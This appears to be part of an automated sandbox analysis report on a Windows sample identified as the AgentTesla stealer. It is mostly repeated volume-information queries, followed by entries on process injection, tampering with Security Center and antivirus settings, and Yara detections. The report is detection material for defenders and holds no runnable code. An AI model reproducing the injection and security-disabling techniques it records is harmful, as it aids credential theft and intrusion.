                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exe	Code function: 6_2_0040A272 WriteProcessMemory,GetVersionExW,CreateRemoteThread,

                      Lowering of HIPS / PFW / Operating System Security Settings:

                      Changes security center settings (notifications, updates, antivirus, firewall)
                      Source: C:\Windows\System32\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval
                      Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
                      Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
                      Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
                      Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct
                      Source: svchost.exe, 00000010.00000002.556137517.0000022F49629000.00000004.00000001.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

                      Stealing of Sensitive Information:

                      Yara detected AgentTesla
                      Source: Yara match	File source: 1.0.VknMvPoCXZ.exe.38d97c0.25.raw.unpack, type: UNPACKEDPE
                      Source: Yara match	File source: 1.0.VknMvPoCXZ.exe.39197e0.9.unpack, type: UNPACKEDPE
                      Source: Yara match	File source: 1.0.VknMvPoCXZ.exe.38d97c0.25.unpack, type: UNPACKEDPE
                      Source: Yara match	File source: 1.0.VknMvPoCXZ.exe.38d97c0.29.unpack, type: UNPACKEDPE
                      Source: Yara match	File source: 1.0.VknMvPoCXZ.exe.38d97c0.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara match	File source: 40.2.svchost.exe.3e21420.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara match	File source: 1.2.VknMvPoCXZ.exe.38b97a0.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara match	File source: 40.2.svchost.exe.3ef0098.8.unpack, type: UNPACKEDPE
                      Source: Yara match	File source: 40.2.svchost.exe.3ef0098.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara match	File source: 1.2.VknMvPoCXZ.exe.39197e0.8.unpack, type: UNPACKEDPE
                      Source: Yara match	File source: 40.2.svchost.exe.3e81c80.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara match	File source: 1.0.VknMvPoCXZ.exe.38b97a0.24.raw.unpack, type: UNPACKEDPE
                      Source: Yara match	File source: 1.0.VknMvPoCXZ.exe.38b97a0.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara match	File source: 1.0.VknMvPoCXZ.exe.39197e0.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara match	File source: 1.2.VknMvPoCXZ.exe.38d97c0.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara match	File source: 1.2.VknMvPoCXZ.exe.38d97c0.7.unpack, type: UNPACKEDPE
                      Source: Yara match	File source: 1.0.VknMvPoCXZ.exe.39197e0.28.unpack, type: UNPACKEDPE
                      Source: Yara match	File source: 1.0.VknMvPoCXZ.exe.39197e0.31.unpack, type: UNPACKEDPE
                      Source: Yara match	File source: 1.0.VknMvPoCXZ.exe.38d97c0.29.raw.unpack, type: UNPACKEDPE
                      Source: Yara match	File source: 1.0.VknMvPoCXZ.exe.38b97a0.30.raw.unpack, type: UNPACKEDPE
                      Source: Yara match	File source: 1.0.VknMvPoCXZ.exe.38d97c0.7.unpack, type: UNPACKEDPE
                      Source: Yara match	File source: 1.0.VknMvPoCXZ.exe.39197e0.31.raw.unpack, type: UNPACKEDPE
                      Source: Yara match	File source: 40.2.svchost.exe.3e41440.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara match	File source: 1.2.VknMvPoCXZ.exe.39197e0.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara match	File source: 1.0.VknMvPoCXZ.exe.39197e0.28.raw.unpack, type: UNPACKEDPE
                      Source: Yara match	File source: 00000001.00000002.588060641.00000000038A1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match	File source: 00000028.00000002.583413395.0000000003EF0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match	File source: 00000001.00000000.436158543.0000000003919000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match	File source: 00000028.00000002.582962680.0000000003E21000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match	File source: 00000001.00000002.588256996.0000000003919000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match	File source: 00000001.00000000.431825282.00000000038A1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match	File source: 00000001.00000000.434117466.00000000038A1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match	File source: 00000001.00000000.432432130.0000000003919000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match	File source: 00000001.00000000.374239562.00000000038A1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match	File source: 00000001.00000000.374484408.0000000003919000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match	File source: Process Memory Space: VknMvPoCXZ.exe PID: 2244, type: MEMORYSTR
                      Source: Yara match	File source: Process Memory Space: svchost.exe PID: 4496, type: MEMORYSTR

Remote Access Functionality:

Yara detected AgentTesla
Source: Yara match; File source: 1.0.VknMvPoCXZ.exe.38d97c0.25.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.0.VknMvPoCXZ.exe.39197e0.9.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.0.VknMvPoCXZ.exe.38d97c0.25.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.0.VknMvPoCXZ.exe.38d97c0.29.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.0.VknMvPoCXZ.exe.38d97c0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 40.2.svchost.exe.3e21420.4.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.2.VknMvPoCXZ.exe.38b97a0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 40.2.svchost.exe.3ef0098.8.unpack, type: UNPACKEDPE
Source: Yara match; File source: 40.2.svchost.exe.3ef0098.8.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.2.VknMvPoCXZ.exe.39197e0.8.unpack, type: UNPACKEDPE
Source: Yara match; File source: 40.2.svchost.exe.3e81c80.6.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.0.VknMvPoCXZ.exe.38b97a0.24.raw.unpack, type: UNPACKEDPE
